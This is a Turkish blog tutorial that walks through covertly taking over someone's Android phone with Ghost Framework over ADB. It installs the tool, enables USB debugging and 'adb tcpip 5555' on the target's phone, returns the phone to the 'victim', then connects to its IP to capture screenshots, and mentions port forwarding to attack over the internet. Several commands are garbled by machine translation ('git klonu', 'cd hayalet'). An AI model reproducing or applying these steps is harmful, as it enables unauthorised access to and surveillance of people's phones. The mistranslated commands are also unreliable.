Ghost Framework Kullanarak IP Adresli Android Cihazları Hackleme

 Ghost Framework -- Android Cihazları Uzaktan Kontrol Edin

Ghost Framework, bir Android cihazına uzaktan erişmek için Android Debug Bridge'den yararlanan bir Android sömürme sonrası çerçevesidir. Ghost Framework, size uzaktan Android cihaz yönetiminin gücünü ve rahatlığını sunar.


Bu çerçeveyi "Geliştirici seçenekleri"nde hata ayıklama köprüsünü açan eski Android cihazlarını kontrol etmek için kullanabiliriz.

Artık bu çok zararlı hale geliyor çünkü bir saldırgan, savunmasız Android cihazında tam yönetici kontrolüne sahip oluyor.

Bu ayrıntılı öğreticimizde, Android cihazının kontrolünü Kali Linux sistemimizden almak için Ghost Framework'ü nasıl kullanabileceğimizi pratik olarak öğreneceğiz.


Bu yüzden Kurulum Gereksinimlerinden başlıyoruz 

Not: - Bu saldırıyı yapıyoruz yerel Ağ Aygıtı Aynı Ağ Olmalı 

Adım 1: - Bir terminal açın ve ardından aşağıdaki komutu kullanarak ADB'yi kurun

sudo apt-get güncellemesi
sudo apt-get install android-tools-adb
sudo apt-get install android-tools-fastboot

Adım 2 : - Aşağıdaki komutu kullanarak Ghost Framework'ü GitHub'dan klonlayın:


git klonu https://github.com/entynetproject/ghost

Komutun ekran görüntüsü aşağıdaki gibidir:


Adım 3 : - Daha sonra cd komutunu kullanarak ghost dizine gidiyoruz:

cd hayalet

Adım 4 : - Şimdi yükleyici komut dosyasını kullanarak yüklememiz gerekiyor. Bundan önce, aşağıdaki komutu uygulayarak yükleyici komut dosyasına izin veriyoruz:

sudo chmod +x install.sh
Adım 5 : - Şimdi aşağıdaki komutu kullanarak yükleyici komut dosyasını çalıştırabiliriz:

sudo ./install.sh

Ardından bağımlılıkları yüklemeye başlayacak ve aşağıdaki ekran görüntüsünün çıktısı oluşacak:




Bu işlem internet hızınıza bağlı olarak biraz zaman alacaktır.

Şimdi Her şey yüklendi.

Adım 1'i kullanmaya başlayalım : - Telefon hakkında'ya gidin ve ardından



Adım 2 olarak Yapı Numarasına 7 kez dokunun : - Şimdi ayara geri dönün ve şimdi görebilirsiniz, bir Geliştirme seçeneği olacak. buna tıklayın ve ardından USB Hata Ayıklamayı  Şimdi Etkinleştir işaretleyin, Android cihazını USB kablosuyla bağlayın ve istendiğinde USB Hata Ayıklamaya izin verin. Bağlantının başarılı olup olmadığını doğrulamak için aşağıdaki komutu yürütün:

adb devices




Adım 3 : - Bu Android Cihazında tcpip'i etkinleştirmek için aşağıdaki komutu tekrar yazın.

adb tcpip 5555


Artık USB kablosunu kaldırabilirsiniz, kurbana geri verin.

Adım 4 : - Artık Ghost Framework'ü terminalimizin herhangi bir yerinden yalnızca Ghost komutuyla çalıştırabiliriz:

ghost

Ve ghost, ana menüsüyle aşağıdaki ekran görüntüsü olarak görünecek veya tüm komutları almak için help yazın:




 Adım 5 : - Şimdi kurbanın cep telefonuna bağlanmak için aşağıdaki komutu yazın 


connect 192.168.43.212


burada connect , kurban mobilinin bir komutu ve IP adresidir, artık yükün bağlı olduğunu görebilirsiniz.



Adım 6 : - aşağıdaki komutu kullanarak kurbanın Mobil ekran görüntüsünü alacağız: 


screenshot /root




  Ekran görüntüsü komuttur ve /root, ekran görüntüsünün kaydedilmesini istediğiniz Dizindir. benim durumumda /root klasörüne kaydedeceğim .

Not: Burada, o Android cihazla yapabileceğiniz birçok istismar var.
WAN Üzerinden PhoneSploit kullanmak istiyorsanız, Port Yönlendirmeyi kullanın.








Daha yeni Daha eski

POST ADS1

POST ADS 2